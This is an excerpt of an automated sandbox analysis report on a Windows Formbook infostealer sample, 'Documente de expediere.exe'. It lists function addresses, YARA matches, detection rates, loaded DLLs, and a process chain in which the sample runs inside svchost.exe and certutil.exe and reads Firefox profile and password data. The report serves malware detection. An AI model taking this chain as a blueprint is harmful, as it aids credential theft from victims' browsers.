            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_031078AF13_2_031078AF
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310790A13_2_0310790A
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310790E13_2_0310790E
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310988A13_2_0310988A
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310FFB513_2_0310FFB5
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310FFBA13_2_0310FFBA
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_0310966A13_2_0310966A
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeCode function: 13_2_03126EFA13_2_03126EFA
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562053514_2_05620535
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056E059114_2_056E0591
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D244614_2_056D2446
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C442014_2_056C4420
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056CE4F614_2_056CE4F6
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562077014_2_05620770
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0564475014_2_05644750
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0561C7C014_2_0561C7C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563C6E014_2_0563C6E0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056A815814_2_056A8158
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0561010014_2_05610100
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056BA11814_2_056BA118
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D81CC14_2_056D81CC
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056E01AA14_2_056E01AA
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D41A214_2_056D41A2
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056B200014_2_056B2000
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DA35214_2_056DA352
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056E03E614_2_056E03E6
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562E3F014_2_0562E3F0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C027414_2_056C0274
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056A02C014_2_056A02C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562AD0014_2_0562AD00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056BCD1F14_2_056BCD1F
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0561ADE014_2_0561ADE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05638DBF14_2_05638DBF
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05620C0014_2_05620C00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05610CF214_2_05610CF2
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C0CB514_2_056C0CB5
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05694F4014_2_05694F40
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05662F2814_2_05662F28
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05640F3014_2_05640F30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C2F3014_2_056C2F30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562CFE014_2_0562CFE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05612FC814_2_05612FC8
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0569EFA014_2_0569EFA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05620E5914_2_05620E59
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DEE2614_2_056DEE26
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DEEDB14_2_056DEEDB
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05632E9014_2_05632E90
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DCE9314_2_056DCE93
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563696214_2_05636962
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056229A014_2_056229A0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056EA9A614_2_056EA9A6
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562284014_2_05622840
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562A84014_2_0562A840
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0564E8F014_2_0564E8F0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056068B814_2_056068B8
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DAB4014_2_056DAB40
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D6BD714_2_056D6BD7
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0561EA8014_2_0561EA80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D757114_2_056D7571
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056E95C314_2_056E95C3
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056BD5B014_2_056BD5B0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0561146014_2_05611460
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DF43F14_2_056DF43F
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DF7B014_2_056DF7B0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0566563014_2_05665630
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D16CC14_2_056D16CC
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056EB16B14_2_056EB16B
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0565516C14_2_0565516C
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0560F17214_2_0560F172
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562B1B014_2_0562B1B0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D70E914_2_056D70E9
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DF0E014_2_056DF0E0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056CF0CC14_2_056CF0CC
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056270C014_2_056270C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0560D34C14_2_0560D34C
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D132D14_2_056D132D
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0566739A14_2_0566739A
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C12ED14_2_056C12ED
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563B2C014_2_0563B2C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056252A014_2_056252A0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D7D7314_2_056D7D73
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05623D4014_2_05623D40
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D1D5A14_2_056D1D5A
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563FDC014_2_0563FDC0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05699C3214_2_05699C32
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DFCF214_2_056DFCF2
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DFF0914_2_056DFF09
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_055E3FD514_2_055E3FD5
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_055E3FD214_2_055E3FD2
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DFFB114_2_056DFFB1
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05621F9214_2_05621F92
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05629EB014_2_05629EB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0562995014_2_05629950
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563B95014_2_0563B950
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056B591014_2_056B5910
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0568D80014_2_0568D800
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056238E014_2_056238E0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DFB7614_2_056DFB76
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05695BF014_2_05695BF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0565DBF914_2_0565DBF9
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0563FB8014_2_0563FB80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05693A6C14_2_05693A6C
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056DFA4914_2_056DFA49
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056D7A4614_2_056D7A46
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056CDAC614_2_056CDAC6
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05665AA014_2_05665AA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056BDAAC14_2_056BDAAC
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056C1AA314_2_056C1AA3
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032B196014_2_032B1960
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032CA3D014_2_032CA3D0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032ACB4014_2_032ACB40
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032ACD6014_2_032ACD60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032AADE014_2_032AADE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032B348B14_2_032B348B
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032B349014_2_032B3490
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543C07C14_2_0543C07C
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543B0E814_2_0543B0E8
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543C08614_2_0543C086
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543A3FB14_2_0543A3FB
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543BCE314_2_0543BCE3
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543BE4C14_2_0543BE4C
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_0543BBC414_2_0543BBC4
            Source: C:\Windows\SysWOW64\certutil.exeCode function: String function: 0569F290 appears 105 times
            Source: C:\Windows\SysWOW64\certutil.exeCode function: String function: 05667E54 appears 111 times
            Source: C:\Windows\SysWOW64\certutil.exeCode function: String function: 05655130 appears 58 times
            Source: C:\Windows\SysWOW64\certutil.exeCode function: String function: 0560B970 appears 277 times
            Source: C:\Windows\SysWOW64\certutil.exeCode function: String function: 0568EA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: String function: 00697F41 appears 35 times
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: String function: 006B0D27 appears 70 times
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: String function: 006B8B40 appears 42 times
            Source: Documente de expediere.exe, 00000000.00000003.1254070960.000000000415D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Documente de expediere.exe
            Source: Documente de expediere.exe, 00000000.00000003.1255841027.0000000003FB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Documente de expediere.exe
            Source: Documente de expediere.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: QAWHbhvedb.exe, 0000000F.00000002.3712964134.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610084402.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/9
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FA2D5 GetLastError,FormatMessageW,0_2_006FA2D5
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E8713 AdjustTokenPrivileges,CloseHandle,0_2_006E8713
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006E8CC3
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006FB59E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0070F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0070F121
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006FC602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_006FC602
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00694FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00694FE9
            Source: C:\Users\user\Desktop\Documente de expediere.exeFile created: C:\Users\user~1\AppData\Local\Temp\autD782.tmpJump to behavior
            Source: Documente de expediere.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: certutil.exe, 0000000E.00000002.3705861434.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1782329374.000000000367A000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3705861434.000000000367A000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3705861434.0000000003685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Documente de expediere.exeReversingLabs: Detection: 73%
            Source: Documente de expediere.exeVirustotal: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\Documente de expediere.exe "C:\Users\user\Desktop\Documente de expediere.exe"
            Source: C:\Users\user\Desktop\Documente de expediere.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeProcess created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"
            Source: C:\Windows\SysWOW64\certutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Documente de expediere.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"Jump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeProcess created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documente de expediere.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: iphlpapi.dllJump to behavior
